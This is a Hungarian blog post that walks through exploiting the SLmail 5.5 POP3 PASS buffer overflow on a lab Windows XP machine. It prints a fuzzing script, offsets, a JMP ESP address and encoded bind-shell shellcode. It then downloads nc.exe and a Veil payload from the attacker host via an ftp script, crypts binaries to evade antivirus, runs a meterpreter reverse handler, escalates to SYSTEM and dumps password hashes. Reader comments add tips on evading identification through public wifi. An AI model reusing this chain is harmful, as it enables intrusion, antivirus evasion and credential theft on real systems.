2014. január 23., csütörtök

SLmail exploit


1st step download this : http://www.offensive-security.com/pwbonline/extrabos.tar.gz
2nd step : install the slmail application to XP machine

netstat -naob

 Protokoll  Helyi cím              Idegen cím             Állapot           PID
  TCP    0.0.0.0:25             0.0.0.0:0              FIGYEL          1944
  [slsmtp.exe]

  TCP    0.0.0.0:79             0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:106            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

  TCP    0.0.0.0:110            0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]

...

  TCP    0.0.0.0:180            0.0.0.0:0              FIGYEL          1840
  [SLadmin.exe]
...
  TCP    127.0.0.1:8376         0.0.0.0:0              FIGYEL          2376
  [SLmail.exe]
...
  UDP    0.0.0.0:50             *:*                                    2376
  [SLmail.exe]

  UDP    0.0.0.0:54             *:*                                    2376
  [SLmail.exe]
...

root@kali:~# unicornscan -mT 192.168.56.105
TCP open                smtp[   25]        from 192.168.56.105  ttl 128
TCP open              finger[   79]        from 192.168.56.105  ttl 128
TCP open          3com-tsmux[  106]        from 192.168.56.105  ttl 128
TCP open                pop3[  110]        from 192.168.56.105  ttl 128
TCP open               epmap[  135]        from 192.168.56.105  ttl 128
TCP open         netbios-ssn[  139]        from 192.168.56.105  ttl 128
TCP open        microsoft-ds[  445]        from 192.168.56.105  ttl 128
TCP open             unknown[ 8081]        from 192.168.56.105  ttl 128

root@kali:~# nmap -sV -A 192.168.56.105 -pT:25,79,106,110,180

25/tcp  open  smtp    SLmail smtpd 5.5.0.4433
| smtp-commands: xxxxx-30298B2AD.com, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN,
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT
79/tcp  open  finger  SLMail fingerd
|_finger: Finger online user list request denied.
106/tcp open  pop3pw  SLMail pop3pw
110/tcp open  pop3    BVRP Software SLMAIL pop3d
180/tcp open  ris?

root@kali:~# nc 192.168.56.105 25
220 xxxxx-30298B2AD.com SMTP Server SLmail 5.5.0.4433 Ready ESMTP spoken here
HELO my
250 xxxxx-30298B2AD.com
HELP
214-This server supports the following commands.
214-HELO    MAIL    RCPT    DATA    RSET
214-SEND    SOML    SAML    HELP    NOOP
214 QUIT
QUIT
221 xxxxx-30298B2AD.com Service closing transmission channel

root@kali:~# nc 192.168.56.105 79
?
Unable to find specified user.

root@kali:~# nc 192.168.56.105 106
200 hello
help
500 protocol error
?
500 protocol error
quit
200 bye

root@kali:~# nc 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00005.988109@xxxxx-30298B2AD.com>
HELP
-ERR unknown command
?
-ERR unknown command
QUIT
+OK POP3 server xxxxx-30298B2AD.com signing off.

root@kali:~# nc 192.168.56.105 180
?
HELP
QUIT
^C

http://www.exploit-db.com/exploits/638/

root@kali:~# searchsploit slmail
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
SLMail 5.5 POP3 PASS Buffer Overflow Exploit                                /windows/remote/638.py
SLMAIL 5.5 POP3 PASS - Remote Buffer Overflow Exploit                       /windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit                                 /windows/remote/646.c

root@kali:~# cat slmail_buf.py
import sys
import struct
import socket
from time import sleep

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = 'A'*2000
s.connect((sys.argv[1],int(sys.argv[2])))
data=s.recv(1024)
print data
s.send('USER user\r\n')
data=s.recv(1024)
print data
s.send('PASS '+buffer+'\r\n')
data=s.recv(1024)
print data
s.close()

ollydbg Attach SLMAIL.exe
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00006.1554953@xxxxx-30298B2AD.com>

+OK user welcome here

-ERR unable to lock mailbox

buffer = 'A'*5000

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00007.1647656@xxxxx-30298B2AD.com>

+OK user welcome here

^CTraceback (most recent call last):
  File "slmail_buf.py", line 16, in <module>
    data=s.recv(1024)
KeyboardInterrupt

ESP 01BFA154 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 41414141
EIP 41414141

root@kali:~# /usr/share/metasploit-framework/tools/pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A...

buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa...

root@kali:~# python slmail_buf.py 192.168.56.105 110

ESP 01BFA154 ASCII "2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh
EBP 46307A46
EIP 7A46317A

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 7A46317A
[*] Exact match at offset 4654

root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 2Fz3
[*] Exact match at offset 4658

ollydbg Search JMP ESP

7C91FCD8   FFE4             JMP ESP

root@kali:~# msfpayload  windows/shell_bind_tcp RPORT=4444 R | msfencode -a x86 -b '\x00\x0a\x0d' -t python
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

buf =  ""
buf += "\xdb\xd2\xb8\xb3\xb6\xb4\xe1\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x56\x31\x47\x18\x03\x47\x18\x83\xc7\xb7\x54"
buf += "\x41\x1d\x5f\x11\xaa\xde\x9f\x42\x22\x3b\xae\x50\x50"
...
buffer = '\x41' * 4654 + '\xD8\xFC\x91\x7C' + '\x90'*32 + buf

root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00001.6738453@xxxxx-30298B2AD.com>

+OK user welcome here

root@kali:~# nc 192.168.56.105 4444
Microsoft Windows XP [verzi&#65533;sz&#65533;m: 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmailSystem>

Next Step : Bypass the AV & privilege escalation.

C:\Program Files\SLmail\System>tftp -i 192.168.56.101 GET nc.exe
tftp -i 192.168.56.101 GET nc.exe
A hozz�f�r�s megtagadva.

AV log:

2014.01.24.    09:46:38    Blocked by Access Protection rule     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\cmd.exe    C:\WINDOWS\system32\tftp.exe    Anti-virus Standard Protection:Prevent use of tftp.exe    Action blocked : Read

C:\Program Files\SLmail\System>echo open 192.168.56.101 21> ftp.txt
echo open 192.168.56.101 21> ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET nc.exe>>ftp.txt
echo GET nc.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhaszn�l� (192.168.56.101:(none)): open 192.168.56.101 21

bin
GET nc.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajt�ban (C) l�v� k�tet xp_system.
 A k�tet sorozatsz�ma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  09:48    <DIR>          .
2014.01.24.  09:48    <DIR>          ..
2014.01.24.  09:47                56 ftp.txt
2002.11.19.  11:40             3�358 listrcrd.txt
2014.01.23.  09:24             1�898 maillog.000
2014.01.24.  00:00            51�104 maillog.001
2014.01.24.  09:33             6�141 maillog.txt
               5 f�jl            62�557 b�jt
               2 k�nyvt�r  30�726�782�976 b�jt szabad

C:\Program Files\SLmail\System>

AV log:

2014.01.24.    9:48:12    Deleted     NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\ftp.exe    C:\Program Files\SLmail\System\nc.exe    Tool-NetCat (Potentially Unwanted Program)

Generate a payload16.exe with Veil.

C:\Program Files\SLmail\System>echo open 192.168.56.101 21>ftp.txt
echo open 192.168.56.101 21>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt

C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\Program Files\SLmail\System>echo GET payload16.exe>>ftp.txt
echo GET payload16.exe>>ftp.txt

C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt

C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhaszn�l� (192.168.56.101:(none)): open 192.168.56.101 21


bin
GET payload16.exe
bye

C:\Program Files\SLmail\System>dir
dir
 A meghajt�ban (C) l�v� k�tet xp_system.
 A k�tet sorozatsz�ma: 6C1F-E27C

 C:\Program Files\SLmail\System tartalma:

2014.01.24.  10:27    <DIR>          .
2014.01.24.  10:27    <DIR>          ..
2014.01.24.  10:27                63 ftp.txt
2002.11.19.  11:40             3�358 listrcrd.txt
2014.01.23.  09:24             1�898 maillog.000
2014.01.24.  00:00            51�104 maillog.001
2014.01.24.  10:03             6�309 maillog.txt
2014.01.24.  10:27         3�059�256 payload16.exe
               6 f�jl         3�121�988 b�jt
               2 k�nyvt�r  30�723�756�032 b�jt szabad

C:\Program Files\SLmail\System>

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.101:443
[*] Starting the payload handler...

C:\Program Files\SLmail\System>payload16.exe
payload16.exe

msf exploit(handler) >
[*] Sending stage (770048 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.101:443 -> 192.168.56.105:3089) at 2014-01-24 10:56:18 +0100

sessions -l

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ xxxxx-30298B2AD  192.168.56.101:443 -> 192.168.56.105:3089 (192.168.56.105)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : xxxxx-30298B2AD
OS              : Windows XP (Build 2600, Szervizcsomag 3).
Architecture    : x86
System Language : hu_HU
Meterpreter     : x86/win32
meterpreter >

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session     User                                                                                                      Path
 ---   ----  ----                  ----  -------     ----                                                                                                      ----
 0     0     [System Process]            4294967295                                                                                                           
 4     0     System                x86   0           NT AUTHORITY\SYSTEM                                                                                      
 188   2012  explorer.exe          x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\WINDOWS\Explorer.EXE
 300   1600  cmd.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\WINDOWS\system32\cmd.exe
...

 532   848   FrameworkService.exe  x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\Common Framework\FrameworkService.exe
 580   848   VsTskMgr.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
 644   2476  McTray.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\Common Framework\McTray.exe
 712   644   shstat.exe            x86   0           xxxxx-30298B2AD\Admin                                                                                     C:\Program Files\McAfee\VirusScan Enterprise\SHSTAT.EXE
 744   848   mdm.exe               x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
 752   580   mfeann.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\McAfee\VirusScan Enterprise\mfeann.exe
...
                                                                           C:\WINDOWS\system32\mfevtps.exe
 976   3676  payload16.exe         x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\payload16.exe
...

 1840  848   SLadmin.exe           x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLadmin\SLadmin.exe
 1944  848   SLSmtp.exe            x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\slsmtp.exe
...

 2100  300   nc.exe                x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\SLmail\System\nc.exe
 2136  848   mcshield.exe          x86   0           NT AUTHORITY\SYSTEM                                                                                       C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe

meterpreter >

I encrypted the nc.exe too.... :

root@kali:~/Hyperion-1.0# wine crypter.exe nc.exe nc_crypt.exe

Opening nc.exe
Copied file to memory: 0x117358
Found valid MZ signature
Found pointer to PE Header: 0xd8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000

...

Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm nc_crypt.exe
FASM Working Directory: Z:\root\Hyperion-1.0

Executing fasm.exe

The AV bypassed...

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Admin:1022:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
ASPNET:1004:275b6f5ffbf7997723474a13bebfa08d:738da873863e137c2e75504e6a8b4ca5:::
Rendszergazda:1005:aad3b435b51404eeaad3b435b51404ee:6f3961367d2b4d1f55f14af59f34cd45:::
Seg�ts�gny�jt�:1021:b3c85a07a2fc61530574f646d69db64a:2e82f56f50cfaa7347b018126bcad628:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bf0859717440c82b18e3f5cb36db8211:::
user:1023:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Vend�g:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

Game OVER.

3 megjegyzés:

  1. Szia! Nagyon szuper blog!

    Privátban szeretnék tőled egy kis segítséget kérni C# programozásban. :-)

    email:jack-spaero[@]freemail.hu

    VálaszTörlés
  2. Ezzel vége a TOR-nak:

    http://pcforum.hu/hirek/15785/Megszerezte+az+FBI+az+osszes+a+Tor-on+keresztul+elkuldott+levelet.html

    http://pcforum.hu/hirek/15313/Konnyuszerrel+azonosithatok+a+Tor-t+hasznalo+internetezok.html

    VálaszTörlés
  3. 1. Ip cím elrejtésére a TOR mellett számos más lehetőség van.

    2. nyilvános Net kávézó vagy publikus WiFi , esetleg eldobható mobile stick + TOR és ... sok sikert a beazonosítási kísérletekhez...

    3. anomym email küldésre vannak más szolgáltatások amiket direkt erre hoztak létre...

    4. TOR-t általában azért használ valaki, hogy : a FORRÁS oldalon rejtse a forgalmat. A CÉL oldalon történő rejtőzéshez vannak ettől jobb módszerek.

    Magyarul a TOR arra való, hogy az ISP-d le lássa, hogy mit csinálsz milyen oldalakat látogatsz, stb. A private VPN-ek is erre valók. Ahhoz, hogy a cél oldalon ne lehessen lenyomozni a forrást, nem a TOR a legjobb, hanem az ellenőrizhetetlen forrás-ok alkalmazása (nyilvános wifi-k használata, kocsmák wifi jelszavának megszerzése, anonym proxy-kkal való kombinálása, satöbbi...)

    VálaszTörlés

Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.